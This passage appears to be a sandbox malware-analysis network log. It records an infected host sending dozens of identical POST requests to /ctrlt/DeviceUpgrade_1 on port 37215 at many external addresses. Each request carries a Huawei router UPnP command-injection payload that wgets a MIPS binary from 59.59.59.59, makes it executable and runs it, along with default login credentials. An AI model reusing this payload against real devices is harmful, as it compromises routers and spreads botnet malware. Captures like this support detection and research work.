2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2424192.168.2.1549974157.52.205.22237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.414314985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2425192.168.2.155525441.104.8.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.414550066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2426192.168.2.1545526157.244.95.14737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.419491053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2427192.168.2.155638671.121.200.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:32.419580936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2428192.168.2.1542360197.196.146.22137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.384733915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2429192.168.2.1535100164.86.70.25137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.384774923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2430192.168.2.1551424197.92.34.9637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.384799004 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2431192.168.2.153400241.100.143.7937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.385461092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2432192.168.2.1556642197.68.99.8537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.385488987 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2433192.168.2.1548742157.112.11.14237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.385513067 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2434192.168.2.154987494.239.182.337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:33.385555029 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
